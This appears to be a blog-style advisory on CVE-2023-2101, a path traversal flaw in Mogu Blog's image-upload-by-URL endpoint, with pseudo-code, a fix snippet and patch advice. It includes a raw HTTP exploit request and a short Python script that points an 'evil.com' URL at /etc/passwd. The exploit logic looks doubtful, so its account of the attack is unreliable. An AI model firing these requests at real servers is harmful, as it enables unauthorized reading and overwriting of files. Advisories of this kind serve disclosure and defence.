CVE-2023-2101 - Absolute Path Traversal in Mogu Blog v2 (<= 5.2) – Full Exploit Analysis

In April 2023, a path traversal vulnerability was made public for Mogu Blog, an open-source blog platform developed in Java. This vulnerability, identified as CVE-2023-2101 and catalogued as VDB-226109, allows remote attackers to perform an absolute path traversal attack through the uploadPictureByUrl function.

If your Mogu Blog is v2 up to 5.2, it is important to take action because attackers can exploit this flaw to manipulate server files and potentially gain further access.

What is Path Traversal?

Path Traversal (also called "directory traversal") is a web security bug where an attacker tricks a website backend into accessing directories and files that are outside the intended operational folder. This can expose sensitive files, overwrite data, or even lead to server compromise.

Vulnerable Endpoint

| URL Example                                         | Vulnerable Function   | Parameter         |
|-----------------------------------------------------|----------------------|-------------------|
| /mogu-picture/file/uploadPicsByUrl                | uploadPictureByUrl | urlList         |

How Does The Vulnerability Work?

The function uploadPictureByUrl is supposed to download and store images from user-provided URLs. However, it does not properly validate or sanitize the input received in the urlList argument. Attackers can craft a special request with malicious file paths, causing the server to read or overwrite files anywhere on the filesystem.

Vulnerable Code Snippet (Pseudo-code)

// Located in /mogu-picture/file/uploadPicsByUrl
public void uploadPictureByUrl(HttpServletRequest request) {
    String[] urlList = request.getParameterValues("urlList");
    for (String url : urlList) {
        // ... Some code downloading the file
        // This is the problematic line
        File outFile = new File("/uploads/" + getFileNameFromUrl(url));
        // Saving file without validating the path
        saveFile(outFile, downloadedData);
    }
}

Problem:
The getFileNameFromUrl(url) can be tricked into returning absolute paths, like /etc/passwd, allowing an attacker to overwrite or read arbitrary files.

Example Exploit Input

POST /mogu-picture/file/uploadPicsByUrl HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

urlList[]=http://evil.com/../../../../../../etc/passwd

Here’s a simple exploit using Python’s requests library

import requests

target = 'http://victim.com/mogu-picture/file/uploadPicsByUrl';
payload = {
    'urlList[]': 'http://evil.com/../../../../../../etc/passwd'
}

r = requests.post(target, data=payload)
if r.status_code == 200:
    print("[+] Exploit Sent: Check /uploads for /etc/passwd!")
else:
    print("[-] Exploit failed.")

The payload tells the server to fetch a file from a URL.

- Because the input is not sanitized, the server will treat the manipulated path as a real system file.
- If the attack works, a copy of /etc/passwd will be stored or even exposed through the application.

Impact

- Remote File Read/Write: Attackers can read sensitive files (like /etc/passwd, server configs, database credentials).
- Potential Remote Code Execution: If attackers overwrite files that the server processes (such as web templates or scripts), they might gain the ability to run malicious code.

Update:

Upgrade to Mogu Blog latest version (beyond 5.2). Check releases here.

String fileName = getFileNameFromUrl(url);

// Only allow basename, no directory traversal!
  if (fileName.contains("..") || fileName.startsWith("/")) {
      return; // or throw an error
  }

References

- Official CVE Record (CVE-2023-2101)
- VulDB Entry VDB-226109
- Mogu Blog GitHub
- OWASP Path Traversal

Responsible Disclosure

This exploit and the vulnerability are already public. If you maintain a Mogu Blog instance, please patch immediately or restrict access to /mogu-picture/file/uploadPicsByUrl.

Summary

CVE-2023-2101 is a critical path traversal vulnerability in Mogu Blog v2 up to 5.2. It can be exploited remotely and easily, requiring no account on the target. The flaw exists in the way user-provided URLs are handled when fetching images, exposing the server to file read/write abuse.  
Protect yourself by updating your Mogu Blog and always practice secure coding for file paths.


> If you use Mogu Blog, act now. Never trust user input when dealing with file paths! Stay secure.

Timeline

Published on: 04/15/2023 13:15:00 UTC
Last modified on: 04/24/2023 18:56:00 UTC